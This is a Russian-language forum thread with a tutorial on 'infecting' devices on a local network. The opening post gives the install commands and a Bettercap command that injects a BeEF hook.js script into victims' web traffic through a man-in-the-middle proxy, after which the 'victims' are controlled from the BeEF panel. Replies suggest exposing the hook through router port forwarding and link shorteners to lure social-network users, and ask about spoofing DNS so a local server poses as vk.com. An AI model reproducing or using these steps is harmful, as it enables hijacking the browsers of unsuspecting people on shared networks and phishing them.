Загрузка...

Взламываем устройства в сети с помощью Bettercap и BeEF

Тема в разделе Kali Linux создана пользователем Watchiz 13 окт 2017. (поднята 3 окт 2017) 6733 просмотра

Загрузка...
  1. Watchiz
    Watchiz Автор темы 13 окт 2017 34 24 мар 2017
    НАЧАЛО

    Для начало нам нужно установить Bettercap, пишем следующие команды :

    Код
    apt-get update
    apt-get dist-upgrade
    apt-get install bettercap
    НАСТРАИВАЕМ

    После этого запускаем BeEF Xss Framework

    [IMG]

    Дальше у нас откроется вот такой терминал:

    [IMG]

    Тыкаем на ссылку под названием "UI URL" и логинимся. Пароль и логин: beef.
    Теперь нам надо узнать наш внутренний IP. Пишим ifconfig. В моем случае у меня IP 192.168.100.4.
    Для чего мы узнавали наш IP?
    Для того чтобы мы настроили ссылку на наш HOOK.
    Как видите на терминале с BeEF показан пример ссылки с HOOK и вместо <IP> подставляем наш IP.
    HOOK - это JS скрипт дающий нам доступ к устройству.

    Ну а теперь когда мы поняли что такое HOOK, давайте заражать устройства.
    В этом нам пожет Bettercap. Запускаем его вот с такими параметрами:
    Код
    bettercap --proxy --proxy-module injectjs --js-url "192.168.100.4:3000/hook.js"
    Обьясню какие параметры за что отвечают:

    Отвечает за использование ****** для обхода SSL сертификата.
    Код
    --proxy
    Этот модуль отвечает за инджект скрипта в жертву.
    Код
    --proxy-module injectjs
    А это уже ссылка на наш HOOK.
    Код
    --js-url "192.168.100.4:3000/hook.js
    ЗАХВАТ ЖЕРТВ

    Теперь мы ждем, когда жертва(ы) зайдут на какю-нибудь страницу.
    !!! ПРОШУ ЗАМЕТИТЬ, ЕСЛИ ЖЕРТВА ЗАКРОЕТ СТРАНИЦУ СО СКРИПТОМ МЫ ПОТЕРЯЕМ ДОСТУП, НО ЕСЛИ ОНА ОТКРОЕТ ДРУГУЮ ТО СКРИПТ ВЕРНЕТСЯ !!!

    Переходим на панель BeEF.

    [IMG]

    Ну а дальше сами делаем, если хотите могу запилить тему по этой программе. Но это в другой раз!

    А на этом я прощаюсь с вами был WATCHIZ.

    #моястатья
     
    13 окт 2017 Изменено
  2. kelly13
    kelly13 12 мар 2018 7 23 апр 2017
    Вот мне все любопытно, проканает ли если пробросить нужную переадресацию в роутере.
    Что бы скрипт ломился на WAN а роутер уже давал на внутренний IP:PORT:thinking:
     
  3. Watchiz
    Watchiz Автор темы 13 мар 2018 34 24 мар 2017
    kelly13, можно ли по подробнее?
     
  4. Watchiz
    Watchiz Автор темы 13 мар 2018 34 24 мар 2017
    @RareHoneyBauger, неуверен. Termux та ещё дичь.
     
  5. kelly13
    kelly13 14 мар 2018 7 23 апр 2017
    Могу конечно ошибаться, но в моей голове это выглядит так:
    К примеру имеем внешний белый IP 1.2.3.4 и серый 192.168.0.1
    Как видно, указано в статье что используется порт 3000, следовательно в роутере прописываем маршрут соединений с 1.2.3.4:3000 go to > 192.168.0.1:3000
    В случае если бы такой маршрут прокатил бы, то мы имеем возможность в строке (из кода автора поста)
    Код

    [B]192.168.100.4:3000/ hook.js[/B]
    заменить свой внешник 1.2.3.4:3000/ hook.js, в свою очередь сам маршрутизатор должен адресовать соединение на тот же 192.168.0.1:3000.
    В таком исполнении можно уже подсовывать людям чуть ли не ВК сократив все на vk .cc или goo. gl


    По логике должно сработать собственно, но к сожалению не пробовал и эта мысль родилась буквально за 2 минуты, прошу не ругать сильно. Если я что-то не учел (а скорее всего так и есть, то просьба указать на ошибки.:wink3:
     
  6. Watchiz
    Watchiz Автор темы 14 мар 2018 34 24 мар 2017
    kelly13, Не уверен что сработает.
     
  7. kelly13
    kelly13 15 мар 2018 7 23 апр 2017
    Да и я впрочем то тоже не уверен.
    Но эта так скажем теория не лишена логики.
    Что-ж. Постараюсь проверить как только с работой разгребусь. Отпишусь если что.
     
  8. 0ralo
    0ralo 16 мар 2018 Все было хорошо, пока не стао плохо 3 1 июн 2017
    Это работает с хттпС
     
  9. kelly13
    kelly13 16 мар 2018 7 23 апр 2017
    с HTTPS еще более сомнительный вопрос ибо в связке kali>роутер>жертва не думаю что уместен будет сам сертификат.
     
  10. Ser0o0p
    Ser0o0p 29 июл 2018 0 27 июл 2018
    Помогите у меня ошибка flag provided but not defined: -proxy
    Usage of bettercap:
     
  11. Watchiz
    Watchiz Автор темы 29 июл 2018 34 24 мар 2017
    Почитай FAQ к bettercap. Он знатно обновился.
     
  12. Ser0o0p
    Ser0o0p 29 июл 2018 0 27 июл 2018
    Типа уже так зделать нельзя?
     
  13. Watchiz
    Watchiz Автор темы 29 июл 2018 34 24 мар 2017
    Можно, просто почитай FAQ к нему)
     
  14. Ser0o0p
    Ser0o0p 29 июл 2018 0 27 июл 2018
  15. Ser0o0p
    Ser0o0p 29 июл 2018 0 27 июл 2018
    Cкиньте кто то FAQ к bettercap а то я не понимаю где новая инфа, жму в kali linux bettercap --help фигня
     
  16. Watchiz
    Watchiz Автор темы 29 июл 2018 34 24 мар 2017
  17. Ser0o0p
    Ser0o0p 29 июл 2018 0 27 июл 2018
    спасибо
     
  18. LiqBz
    LiqBz 31 июл 2018 0 31 июл 2018
    Ребят, вот тоже стало интересно. У меня есть доступ к роутеру и есть ли возможность подмены DNS так, чтобы мой localhost, отображался как vk.com?
     
  19. Sincerest
    Sincerest 6 авг 2018 Заблокирован(а) 318 8 янв 2017
    Годный тутор, надо попробовать!
     
Top